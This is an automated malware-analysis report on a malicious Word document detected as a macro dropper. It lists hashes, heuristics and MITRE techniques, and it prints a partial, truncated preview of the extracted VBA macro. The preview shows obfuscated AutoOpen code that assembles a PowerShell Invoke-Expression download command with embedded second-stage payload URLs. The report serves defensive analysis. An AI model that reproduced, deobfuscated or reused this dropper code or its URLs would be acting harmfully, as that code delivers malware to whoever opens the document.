Office (OLE) malware analysis — malicious · bbeea8ca3c007807

MALICIOUS

Office (OLE)

139.5 KB Created: 2018-02-15 03:37:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: f6cd95a83e5d8008a3ff3908d7f160b2 SHA-1: 16c4f536b48c4c0c5b66daaf87e79875c7522167 SHA-256: bbeea8ca3c007807c97d35b0a4cdbaf8d899fbf88c804432a034bc4d5ccf875a

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen function that uses Shell() to execute a command. The macro appears to be obfuscated but attempts to download a payload from a URL. The ClamAV detection name 'Doc.Dropper.Agent' further supports this dropper functionality. The embedded URLs are suspicious and likely point to the second-stage payload.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6449162-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6449162-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://paIWp+IWpcifi9tH+9tHIWp+IWpcbrtoSwDFdjZSiDRXondwEniR In document text (OLE body)
- http://9tH+9tHc9tH+9tHICWL+CWIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 27872 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	27872 bytes
SHA-256: `1ebdcbf47fb52e16ac52ee2ae499f22fbe3d26628b32943f2913d30c2fc0128e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "bldBujaKzliDKf" Function GPHJTzfQiWjtvW() On Error Resume Next kvtCVkS = (rXjXUNKX - Int(zVSHOCoslJft) * lOVQTEEGhAh / Oct(uvudtJVRIWN) - (VIzroHMKXIlSCD - Sin(8982454))) iQEmsSQU = (TiQVla - Int(GuOrAKcZ) * AZvKFNS / Oct(nWKlKbbpPP) - (iGsKvnszaPMAvj - Sin(4394190))) flbkkLiUL = (dIjAGMqh - Int(QjwSnCk) * ivIIOzXMQrKbW / Oct(BnKwjfP) - (RPKviEvimNbFQ - Sin(7630638))) inQQXuXzCv = (jOdWCfhsWp) + HJjkJKD("ilwenv:CoMspeC[4,24,25]-joIN'')((('INvokE-EXPrESSiOn( ((C'+'WL. '+'(jTShAIq", 4, 65) rwQnvIVJLid = (swTUTRlFzz - Int(zOZCjXSb) * wkEDd / Oct(mXzrWZiJV) - (votVEP - Sin(6547045))) PXXhXsKu = (bDTkFF - Int(mDlhIuPrwfOHFd) * TEEsojZGwhCzc / Oct(DBSsujWsb) - (QfwzqqH - Sin(5449394))) OwFOXFzAjq = (jkOjMQONzp - Int(GwmSt) * wPLtUbdrcI / Oct(cPFZZTspoVFc) - (WZDaFTtiDNu - Sin(8621315))) FTnQfbHEnt = (GsBhJHpVFfm) + HJjkJKD("slChkUPfzcmOtjzOrkwinjPJ+'CHar]92-rePlACe([CHar]109+IWp+IWp'+'[CHar]89+[CHar]7C'+'WL+CWL3),[CHar]'+'36 -rePlAC'+'e 9tHGz49tH,[CHar]39) )IWp).REPLAC'+'e(IWp'+'9tHIWp,[strCWL+CWLiNg][cHar]39).REPLACe(IWpqjjpniXN", 25, 180) MrGwi = (vYClIPHYC - Int(jJidjCh) * UElrTzZpz / Oct(wFEFk) - (TkjCbrT - Sin(2433654))) hvFqRDGui = (YvXvQvCaVSb - Int(EEDMTQFZzGaY) * JwTitckY / Oct(uDCtiGw) - (inJcPffqHbN - Sin(7530635))) vTKuREYpo = (RUzaGzivcqr - Int(sKzKZiz) * RYnPsuRnol / Oct(Wldci) - (TcHOk - Sin(1084219))) qvordX = (hjbjducEHqnf) + HJjkJKD("NtwBFNMZvKGRrVLcZCCsZMJiSralhe9tH+IWp+IWp'+'9t'+'Halt9tH+'+'9tHh.c9tH+9tHom/Q'+'w9tH+9tHce/?http9tH+CWL+'+'CWL9tH://gasvers9tH+9tHorgwb", 26, 108) hOYohKlabPq = (FrOhTq - Int(cXwHICIHbNjBTk) * ZUdOHwoJ / Oct(PYbnWwiaqmFo) - (nzojNAAzOoVp - Sin(3537879))) SJCpZNEmj = (EEiBoNIrkbVki - Int(JKhibnjfZbj) * IpBkGzECiVIk / Oct(advNNLcV) - (oEGqNiNYf - Sin(1425137))) pzcnpNL = (AFSqzVXj - Int(AoCwNBKlSM) * GSnBwdP / Oct(ZoGqASQVKFO) - (ovsUzBKdMUbFS - Sin(8443932))) GViDwozzC = (LhuGroVbOhQH) + HJjkJKD("YpVbjvH i9CWL+CWLtH+9tHn 9tH+9tHm'+'YIADCX)9tH+9tH{trCWL+CW'+'Ly9tH+9tH{m9tH+9tHYIYY9tH+9tHU.9tH+9tHZ29tIWp+IWpH+9tHg9tH+9tHDoh6nWnl9tH+9tHh9tH+9tH6nOadCWL+CWLFIh6'+'nHwqZMSnjamkbSppuMrUGizr", 7, 161) TXzRXRGO = (DTbKaTCuTlW - Int(MAXIGj) * tLsmA / Oct(FZBAjjhTwCwQ) - (HzOzB - Sin(3895949))) vkvjVUk = (BauasXNb - Int(UKhaVU) * AunFplQzYsFcG / Oct(MrSkniibHI) - (FNbrRqim - Sin(713586))) TGJBLLDOmwo = (EOPaPJw - Int(ARlVb) * TPqiqP / Oct(miljYpGGB) - (pCQHcDJYUi - Sin(4922133))) HlwCjc = (nuzBiwfA) + HJjkJKD("bQNhjzwuUbWPVpIQrdWDce 9tHZ2g9tH,[CHaCWL+CWLr]34 -rePlACe(['+'CHar]10IWp+IWp0+[CHa'+'r]54+[CWL+CWLCHar]73),['GDKZcLJXawLA", 21, 90) TLkJwSL = (qqUquwqvSL - Int(qMhJVhzinDznVi) * CitOa / Oct(tZShAsiJAnSZ) - (jqSnZHqn - Sin(9153759))) HWFEAv = (rDzHqwMBEl - Int(zmObVpU) * mPhOBBNjq / Oct(GjBwwaiA) - (oNolNnJjDDLE - Sin(3515615))) zPzJnaoInZ = (SIKKpzFcM - Int(hzBJznozV) * jIwiT / Oct(sSJffPoOjp) - (QpDfLASDQmAk - Sin(3074406))) rGBUjaTu = (zwvopSj) + HJjkJKD("SlPEQs+'http://paIWp+IWpcifi9tH+9tHIWp+IWpcbrtoSwDFdjZSiDRXondwEniR", 7, 38) ilwiVr = (AXIRYU - Int(faDnsh) * PRjaYZfHZazss / Oct(clHwabPr) - (RpUBiF - Sin(7624695))) vazGUUGTr = (NFZRZliOAi - Int(whUfcpCpwpRGd) * KPkDXAClz / Oct(mTBDAYjawXtY) - (JsMbQrlvzvtOVz - Sin(2150842))) qhNAp = (iqMijtJozp - Int(FrJGimSaL) * YluNomX / Oct(piaYzS) - (jpNQiYcaUjE - Sin(8104971))) cckBCCGDhj = (FnThqSInZ) + HJjkJKD("zdHtpZprojJbjTOdBHrw'+'9tH+9tHa9tH+9tHndanorphanspIWCWL+CWLp+IWprIWp+IWpoject9t'+'H+9tH.or9tH+9tHg/9tH+9tIWp+IWpHxIeIW'+'p+XVBUbJPiX", 18, 106) IJctmN = (nwLZjkwirN - Int(DZhNcOTSJz) * RQXAKzPSdzNXd / Oct(tspKKD) - (wjtHMdzjdmAf - Sin(9281117))) rwSjUijli = (vCfazSZjiq - Int(EEiVi) * ztCVji / Oct(zVSjzKMrjiwqJ) - (MkPMECFIZON - Sin(9879127))) wGfRwoTrmW = (AltJOXmccA - Int(jTdJXZkiVYnJm) * bbnpvE / Oct(AfMFmVkTW) - (jjZdlZ - Sin(9166856))) KAMAVLpku = (jKKwjtrZzzFK) + HJjkJKD("pvzfBOXtH+ Gz4d6I9t ... (truncated)

SHA-256: 1ebdcbf47fb52e16ac52ee2ae499f22fbe3d26628b32943f2913d30c2fc0128e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "bldBujaKzliDKf"
Function GPHJTzfQiWjtvW()
On Error Resume Next
kvtCVkS = (rXjXUNKX - Int(zVSHOCoslJft) * lOVQTEEGhAh / Oct(uvudtJVRIWN) - (VIzroHMKXIlSCD - Sin(8982454)))
iQEmsSQU = (TiQVla - Int(GuOrAKcZ) * AZvKFNS / Oct(nWKlKbbpPP) - (iGsKvnszaPMAvj - Sin(4394190)))
flbkkLiUL = (dIjAGMqh - Int(QjwSnCk) * ivIIOzXMQrKbW / Oct(BnKwjfP) - (RPKviEvimNbFQ - Sin(7630638)))
inQQXuXzCv = (jOdWCfhsWp) + HJjkJKD("ilwenv:CoMspeC[4,24,25]-joIN'')((('INvokE-EXPrESSiOn( ((C'+'WL. '+'(jTShAIq", 4, 65)
rwQnvIVJLid = (swTUTRlFzz - Int(zOZCjXSb) * wkEDd / Oct(mXzrWZiJV) - (votVEP - Sin(6547045)))
PXXhXsKu = (bDTkFF - Int(mDlhIuPrwfOHFd) * TEEsojZGwhCzc / Oct(DBSsujWsb) - (QfwzqqH - Sin(5449394)))
OwFOXFzAjq = (jkOjMQONzp - Int(GwmSt) * wPLtUbdrcI / Oct(cPFZZTspoVFc) - (WZDaFTtiDNu - Sin(8621315)))
FTnQfbHEnt = (GsBhJHpVFfm) + HJjkJKD("slChkUPfzcmOtjzOrkwinjPJ+'CHar]92-rePlACe([CHar]109+IWp+IWp'+'[CHar]89+[CHar]7C'+'WL+CWL3),[CHar]'+'36  -rePlAC'+'e 9tHGz49tH,[CHar]39) )IWp).REPLAC'+'e(IWp'+'9tHIWp,[strCWL+CWLiNg][cHar]39).REPLACe(IWpqjjpniXN", 25, 180)
MrGwi = (vYClIPHYC - Int(jJidjCh) * UElrTzZpz / Oct(wFEFk) - (TkjCbrT - Sin(2433654)))
hvFqRDGui = (YvXvQvCaVSb - Int(EEDMTQFZzGaY) * JwTitckY / Oct(uDCtiGw) - (inJcPffqHbN - Sin(7530635)))
vTKuREYpo = (RUzaGzivcqr - Int(sKzKZiz) * RYnPsuRnol / Oct(Wldci) - (TcHOk - Sin(1084219)))
qvordX = (hjbjducEHqnf) + HJjkJKD("NtwBFNMZvKGRrVLcZCCsZMJiSralhe9tH+IWp+IWp'+'9t'+'Halt9tH+'+'9tHh.c9tH+9tHom/Q'+'w9tH+9tHce/?http9tH+CWL+'+'CWL9tH://gasvers9tH+9tHorgwb", 26, 108)
hOYohKlabPq = (FrOhTq - Int(cXwHICIHbNjBTk) * ZUdOHwoJ / Oct(PYbnWwiaqmFo) - (nzojNAAzOoVp - Sin(3537879)))
SJCpZNEmj = (EEiBoNIrkbVki - Int(JKhibnjfZbj) * IpBkGzECiVIk / Oct(advNNLcV) - (oEGqNiNYf - Sin(1425137)))
pzcnpNL = (AFSqzVXj - Int(AoCwNBKlSM) * GSnBwdP / Oct(ZoGqASQVKFO) - (ovsUzBKdMUbFS - Sin(8443932)))
GViDwozzC = (LhuGroVbOhQH) + HJjkJKD("YpVbjvH i9CWL+CWLtH+9tHn 9tH+9tHm'+'YIADCX)9tH+9tH{trCWL+CW'+'Ly9tH+9tH{m9tH+9tHYIYY9tH+9tHU.9tH+9tHZ29tIWp+IWpH+9tHg9tH+9tHDoh6nWnl9tH+9tHh9tH+9tH6nOadCWL+CWLFIh6'+'nHwqZMSnjamkbSppuMrUGizr", 7, 161)
TXzRXRGO = (DTbKaTCuTlW - Int(MAXIGj) * tLsmA / Oct(FZBAjjhTwCwQ) - (HzOzB - Sin(3895949)))
vkvjVUk = (BauasXNb - Int(UKhaVU) * AunFplQzYsFcG / Oct(MrSkniibHI) - (FNbrRqim - Sin(713586)))
TGJBLLDOmwo = (EOPaPJw - Int(ARlVb) * TPqiqP / Oct(miljYpGGB) - (pCQHcDJYUi - Sin(4922133)))
HlwCjc = (nuzBiwfA) + HJjkJKD("bQNhjzwuUbWPVpIQrdWDce 9tHZ2g9tH,[CHaCWL+CWLr]34  -rePlACe(['+'CHar]10IWp+IWp0+[CHa'+'r]54+[CWL+CWLCHar]73),['GDKZcLJXawLA", 21, 90)
TLkJwSL = (qqUquwqvSL - Int(qMhJVhzinDznVi) * CitOa / Oct(tZShAsiJAnSZ) - (jqSnZHqn - Sin(9153759)))
HWFEAv = (rDzHqwMBEl - Int(zmObVpU) * mPhOBBNjq / Oct(GjBwwaiA) - (oNolNnJjDDLE - Sin(3515615)))
zPzJnaoInZ = (SIKKpzFcM - Int(hzBJznozV) * jIwiT / Oct(sSJffPoOjp) - (QpDfLASDQmAk - Sin(3074406)))
rGBUjaTu = (zwvopSj) + HJjkJKD("SlPEQs+'http://paIWp+IWpcifi9tH+9tHIWp+IWpcbrtoSwDFdjZSiDRXondwEniR", 7, 38)
ilwiVr = (AXIRYU - Int(faDnsh) * PRjaYZfHZazss / Oct(clHwabPr) - (RpUBiF - Sin(7624695)))
vazGUUGTr = (NFZRZliOAi - Int(whUfcpCpwpRGd) * KPkDXAClz / Oct(mTBDAYjawXtY) - (JsMbQrlvzvtOVz - Sin(2150842)))
qhNAp = (iqMijtJozp - Int(FrJGimSaL) * YluNomX / Oct(piaYzS) - (jpNQiYcaUjE - Sin(8104971)))
cckBCCGDhj = (FnThqSInZ) + HJjkJKD("zdHtpZprojJbjTOdBHrw'+'9tH+9tHa9tH+9tHndanorphanspIWCWL+CWLp+IWprIWp+IWpoject9t'+'H+9tH.or9tH+9tHg/9tH+9tIWp+IWpHxIeIW'+'p+XVBUbJPiX", 18, 106)
IJctmN = (nwLZjkwirN - Int(DZhNcOTSJz) * RQXAKzPSdzNXd / Oct(tspKKD) - (wjtHMdzjdmAf - Sin(9281117)))
rwSjUijli = (vCfazSZjiq - Int(EEiVi) * ztCVji / Oct(zVSjzKMrjiwqJ) - (MkPMECFIZON - Sin(9879127)))
wGfRwoTrmW = (AltJOXmccA - Int(jTdJXZkiVYnJm) * bbnpvE / Oct(AfMFmVkTW) - (jjZdlZ - Sin(9166856)))
KAMAVLpku = (jKKwjtrZzzFK) + HJjkJKD("pvzfBOXtH+ Gz4d6I9t
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.